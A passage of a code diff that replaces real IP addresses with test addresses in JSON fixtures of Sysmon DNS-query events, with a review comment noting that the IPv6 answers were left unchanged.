Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22" }, 
@@ -496,7 +496,7 @@ "ProcessId": "2736", "QueryName": "at.atwola.com", "QueryStatus": "0", - "QueryResults": "type: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:152.195.32.120;", + "QueryResults": "type: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "computer_name": "vagrant-2016", 
@@ -517,7 +517,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028358900Z'/\u003e\u003cEventRecordID\u003e76\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003em.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:204.13.192.56;::ffff:204.13.192.120;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028358900Z'/\u003e\u003cEventRecordID\u003e76\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003em.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" 
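Review bot: The IPv6 answers in the rewritten QueryResults (`2001:503:a83e::2:30`, `2001:503:231d::2:30`, `2001:503:83eb::30`) are left as real public addresses while every IPv4 answer in the same string was replaced, so this fixture is only partly on the supported test-IP subset; the event_data copy in the next hunk (`@@ -541`) has the same mix. Unless the geo/enrichment check this change is working around only covers IPv4, these should be replaced with a documented test IPv6 address as well, or the changelog entry should say that IPv6 answers are intentionally left as-is. The enclosing event object begins before and continues after the hunk.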
@@ -541,7 +541,7 @@ } }, "event_data": { - "QueryResults": "type: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:204.13.192.56;::ffff:204.13.192.120;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;", + "QueryResults": "type: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.274", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -556,7 +556,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028412800Z'/\u003e\u003cEventRecordID\u003e77\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.291\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecms.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:74.6.137.78;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028412800Z'/\u003e\u003cEventRecordID\u003e77\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.291\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecms.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -577,7 +577,7 @@ "event_data": { "QueryName": "cms.analytics.yahoo.com", "QueryStatus": "0", - "QueryResults": "type: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:74.6.137.78;", + "QueryResults": "type: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.291", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -596,7 +596,7 @@ "@timestamp": "2021-05-05T15:30:51.694Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028501000Z'/\u003e\u003cEventRecordID\u003e78\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecvision.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028501000Z'/\u003e\u003cEventRecordID\u003e78\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecvision.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -606,7 +606,7 @@ "time_created": "2019-07-18T03:34:03.028Z", "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;", + "QueryResults": "type: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.413", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -634,7 +634,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028585600Z'/\u003e\u003cEventRecordID\u003e79\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.424\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eg.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028585600Z'/\u003e\u003cEventRecordID\u003e79\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.424\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eg.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -649,7 +649,7 @@ "ProcessId": "2736", "QueryName": "g.bing.com", "QueryStatus": "0", - "QueryResults": "type: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;", + "QueryResults": "type: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "time_created": "2019-07-18T03:34:03.028Z", 
@@ -675,7 +675,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028900300Z'/\u003e\u003cEventRecordID\u003e80\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.427\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elg3.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028900300Z'/\u003e\u003cEventRecordID\u003e80\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.427\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elg3.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -695,7 +695,7 @@ "ProcessId": "2736", "QueryName": "lg3.media.net", "QueryStatus": "0", - "QueryResults": "::ffff:23.52.167.93;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.427", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -712,7 +712,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029031100Z'/\u003e\u003cEventRecordID\u003e81\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.469\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eservice.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:54.88.96.255;::ffff:34.233.100.168;::ffff:54.209.58.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029031100Z'/\u003e\u003cEventRecordID\u003e81\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.469\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eservice.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -727,7 +727,7 @@ "time_created": "2019-07-18T03:34:03.029Z", "level": "information", "event_data": { - "QueryResults": "type: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:54.88.96.255;::ffff:34.233.100.168;::ffff:54.209.58.223;", + "QueryResults": "type: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.469", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -791,7 +791,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029098400Z'/\u003e\u003cEventRecordID\u003e82\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.485\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:184.25.176.117;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
